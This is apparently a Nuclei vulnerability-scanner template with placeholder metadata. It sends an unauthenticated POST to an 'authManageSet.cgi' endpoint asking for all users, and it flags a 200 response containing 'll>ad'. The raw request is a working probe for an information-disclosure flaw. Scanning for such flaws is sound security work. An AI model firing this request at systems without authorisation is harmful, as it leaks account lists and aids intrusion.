id: template-id

info:
  name: Template Name
  author: changge
  severity: info
  description: description
  reference:
    - https://
  tags: tags

requests:
  - raw:
      - |-
        POST /cgi-bin/authUser/authManageSet.cgi HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
        Accept-Encoding: gzip, deflate
        Connection: close
        Upgrade-Insecure-Requests: 1
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 77

        type=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - ll>ad
      - type: status
        status:
          - 200
